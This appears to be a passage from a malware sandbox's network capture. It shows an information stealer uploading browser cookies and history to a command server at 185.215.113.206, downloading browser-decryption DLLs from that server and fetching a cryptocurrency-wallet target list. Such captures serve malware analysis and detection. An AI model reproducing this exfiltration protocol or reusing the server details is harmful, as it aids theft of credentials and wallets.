6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KJDGDBFBGIDGIEBGHCGI--
Nov 15, 2024 14:09:20.222064972 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:20.698208094 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Nov 15, 2024 14:09:20.698308945 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Nov 15, 2024 14:09:21.507528067 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:21.528354883 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDA Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="file"------CGCFIIEBKEGHJJJJJJDA--
Nov 15, 2024 14:09:22.326991081 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:22.707406998 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="file"------CFCBFHJECAKEHIECGIEB--
Nov 15, 2024 14:09:23.510493994 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:23.809525013 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 15, 2024 14:09:24.101326942 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:23 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Nov 15, 2024 14:09:24.101397991 CET	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVE
Nov 15, 2024 14:09:24.101443052 CET	1236	IN	Data Raw: 85 c0 74 1e 8b 75 1c 8b 7d 14 8b 55 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 Data Ascii: tu}UMt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8
Nov 15, 2024 14:09:24.101736069 CET	1236	IN	Data Raw: 00 0f 84 98 02 00 00 8b 75 18 85 f6 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 Data Ascii: uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$
Nov 15, 2024 14:09:24.101756096 CET	1236	IN	Data Raw: 89 45 d8 8d 45 dc 89 f9 31 d2 ff 75 1c ff 75 18 53 50 56 8d 45 e0 50 e8 b4 fa ff ff 83 c4 18 89 c7 85 ff 0f 85 6f 01 00 00 b9 01 e0 ff ff 39 5d dc 0f 85 53 01 00 00 8b 55 e0 0f ca b8 a6 59 59 a6 29 d0 81 c2 5a a6 a6 59 09 c2 0f b6 45 e4 0f b6 4d Data Ascii: EE1uuSPVEPo9]SUYY)ZYEME]M)19DEEE\|0)U\|2!!)]\|3)\|3!)
Nov 15, 2024 14:09:24.102473974 CET	1236	IN	Data Raw: 8c 00 00 00 8b 55 ac 89 c8 31 db 39 ca 74 3c 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 0f b6 0c 07 30 4c 06 0c 0f b6 0c 07 30 8c 06 8c 00 00 00 0f b6 4c 07 01 30 4c 06 0d 0f b6 4c 07 01 30 8c 06 8d 00 00 00 83 c0 02 39 c2 75 d1 8b 4d f0 31 e9 e8 37 Data Ascii: U19t<f.0L0L0LL09uM17L^_[]USWVh1tlEGGHt1Uuut,tGHjSGW:G
Nov 15, 2024 14:09:24.102494955 CET	1236	IN	Data Raw: ff 8b 75 08 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 66 0f 1f 44 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f b6 14 06 0f b6 f9 01 d7 0f b6 8c 05 f0 fe ff ff Data Ascii: ufDT>\>=t%>>f1hM1)^_[]USWV01Eh1E=s hk
Nov 15, 2024 14:09:24.103060961 CET	760	IN	Data Raw: 0f b6 f3 8b 55 f0 8a 3c 32 8b 55 f0 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 61 01 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 62 01 83 f9 02 75 2d 88 5d e8 89 45 ec eb 6e 85 d2 0f 84 7e 02 00 00 8b 75 10 0f b6 0e 83 fa 03 0f 85 81 02 00 Data Ascii: U<2U<U$2MaM2$1MUbu-]En~uMMUEEM]}7}E0MQM2MEP]EU+UUU9)]}1EE
Nov 15, 2024 14:09:24.103081942 CET	1236	IN	Data Raw: c7 04 e9 29 01 00 00 66 0f ef c9 66 0f 6f 05 c0 20 08 10 31 f6 66 0f ef d2 f6 c2 01 0f 84 9b 00 00 00 66 0f 6f 1d d0 20 08 10 66 0f fe d8 0b 75 cc 8b 45 10 66 0f 6e 2c 30 66 0f 6e 64 30 04 66 0f ef f6 66 0f 60 ee 66 0f 61 ee 66 0f 60 e6 66 0f 61 Data Ascii: )ffo 1ffo fuEfn,0fnd0ff`faf`fafrfo5 f[fpffpfpffpfbffrf[fpffpfpffpfbfffpffpUff~MU9UEuUM}]?
Nov 15, 2024 14:09:24.103116989 CET	1236	IN	Data Raw: 04 07 89 45 ec 0f b6 c0 8b 7d f0 8a 0c 07 00 ce 0f b6 f6 8a 2c 37 88 2c 07 88 0c 37 00 cd 8b 45 10 8a 40 06 0f b6 cd 32 04 0f 88 43 06 8b 4d ec e9 2e f7 ff ff cc cc cc 55 89 e5 53 57 56 81 ec 5c 01 00 00 89 8d dc fe ff ff 8b 32 89 95 74 ff ff ff Data Ascii: E},7,7E@2CM.USWV\2tRAA q$]QD1A@1RQP5}gjM31tQI
Nov 15, 2024 14:09:25.106038094 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 15, 2024 14:09:25.393124104 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 15, 2024 14:09:25.931143999 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 15, 2024 14:09:26.222743034 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 15, 2024 14:09:26.643531084 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 15, 2024 14:09:26.929352045 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 15, 2024 14:09:28.341552019 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 15, 2024 14:09:28.632200956 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 15, 2024 14:09:28.887257099 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Nov 15, 2024 14:09:29.169969082 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 15, 2024 14:09:29.658036947 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 15, 2024 14:09:30.449006081 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 15, 2024 14:09:30.862718105 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAKJJDBGCAKKFHIJEGH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 61 64 32 63 66 38 30 32 61 32 66 39 61 61 33 35 30 31 33 37 39 37 66 65 64 61 61 66 31 33 61 36 65 36 66 33 65 38 31 65 31 64 34 35 31 65 35 37 30 32 31 37 33 30 61 65 61 35 32 39 31 32 63 31 62 36 61 35 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 2d 2d 0d 0a Data Ascii: ------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="token"67ad2cf802a2f9aa35013797fedaaf13a6e6f3e81e1d451e57021730aea52912c1b6a520------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="message"wallets------JDAKJJDBGCAKKFHIJEGH--
Nov 15, 2024 14:09:31.148192883 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:30 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 